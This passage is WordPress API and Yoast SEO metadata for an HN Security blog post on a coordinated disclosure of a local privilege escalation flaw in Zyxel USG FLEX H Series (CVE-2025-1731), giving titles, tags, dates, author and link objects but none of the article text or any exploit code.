Specialists\",\"publisher\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#organization\",\"name\":\"HN Security\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"contentUrl\":\"https:\\\/\\\/hnsecurity.it\\\/wp-content\\\/uploads\\\/2026\\\/01\\\/hn-libellula.jpg\",\"width\":696,\"height\":696,\"caption\":\"HN Security\"},\"image\":{\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/hnsec\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/hnsecurity\\\/\",\"https:\\\/\\\/github.com\\\/hnsecurity\",\"https:\\\/\\\/infosec.exchange\\\/@hnsec\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/#\\\/schema\\\/person\\\/89a4174c275f05d6148fb0fdedc8de4f\",\"name\":\"Marco Ivaldi\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g\",\"caption\":\"Marco Ivaldi\"},\"url\":\"https:\\\/\\\/hnsecurity.it\\\/it\\\/blog\\\/author\\\/marco-ivaldi\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -","description":"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","og_locale":"it_IT","og_type":"article","og_title":"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -","og_description":"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).","og_url":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","og_site_name":"HN Security","article_published_time":"2025-04-23T05:27:16+00:00","article_modified_time":"2025-10-21T09:01:44+00:00","og_image":[{"width":1600,"height":836,"url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","type":"image\/jpeg"}],"author":"Marco Ivaldi","twitter_card":"summary_large_image","twitter_creator":"@hnsec","twitter_site":"@hnsec","twitter_misc":{"Scritto da":"Marco Ivaldi","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#article","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/"},"author":{"name":"Marco Ivaldi","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f"},"headline":"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)","datePublished":"2025-04-23T05:27:16+00:00","dateModified":"2025-10-21T09:01:44+00:00","mainEntityOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/"},"wordCount":1317,"publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","keywords":["cve-2025-1731","network","0day","advisory","exploit","vulnerability research","zyxel"],"articleSection":["Exploits","Vulnerabilities"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","url":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/","name":"HN Security - Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) -","isPartOf":{"@id":"https:\/\/hnsecurity.it\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage"},"thumbnailUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","datePublished":"2025-04-23T05:27:16+00:00","dateModified":"2025-10-21T09:01:44+00:00","description":"Coordinated disclosure of a local privilege escalation vulnerability on Zyxel USG FLEX H Series (CVE-2025-1731).","breadcrumb":{"@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#primaryimage","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","width":1600,"height":836,"caption":"Zyxel Networks logo"},{"@type":"BreadcrumbList","@id":"https:\/\/hnsecurity.it\/it\/blog\/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hnsecurity.it\/it\/"},{"@type":"ListItem","position":2,"name":"Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)"}]},{"@type":"WebSite","@id":"https:\/\/hnsecurity.it\/it\/#website","url":"https:\/\/hnsecurity.it\/it\/","name":"HN Security","description":"Offensive Security Specialists","publisher":{"@id":"https:\/\/hnsecurity.it\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hnsecurity.it\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/hnsecurity.it\/it\/#organization","name":"HN Security","url":"https:\/\/hnsecurity.it\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/","url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","contentUrl":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2026\/01\/hn-libellula.jpg","width":696,"height":696,"caption":"HN Security"},"image":{"@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/hnsec","https:\/\/www.linkedin.com\/company\/hnsecurity\/","https:\/\/github.com\/hnsecurity","https:\/\/infosec.exchange\/@hnsec"]},{"@type":"Person","@id":"https:\/\/hnsecurity.it\/it\/#\/schema\/person\/89a4174c275f05d6148fb0fdedc8de4f","name":"Marco Ivaldi","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/a8a96db06e7315a061d28b320ee7bb4c9d0f1535c58bf0f54218bf8a7569bea0?s=96&d=mm&r=g","caption":"Marco Ivaldi"},"url":"https:\/\/hnsecurity.it\/it\/blog\/author\/marco-ivaldi\/"}]}},"jetpack_featured_media_url":"https:\/\/hnsecurity.it\/wp-content\/uploads\/2025\/09\/ZYXEL.jpg","_links":{"self":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/5313","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/comments?post=5313"}],"version-history":[{"count":8,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/5313\/revisions"}],"predecessor-version":[{"id":161160,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/posts\/5313\/revisions\/161160"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media\/159969"}],"wp:attachment":[{"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/media?parent=5313"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/categories?post=5313"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hnsecurity.it\/it\/wp-json\/wp\/v2\/tags?post=5313"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}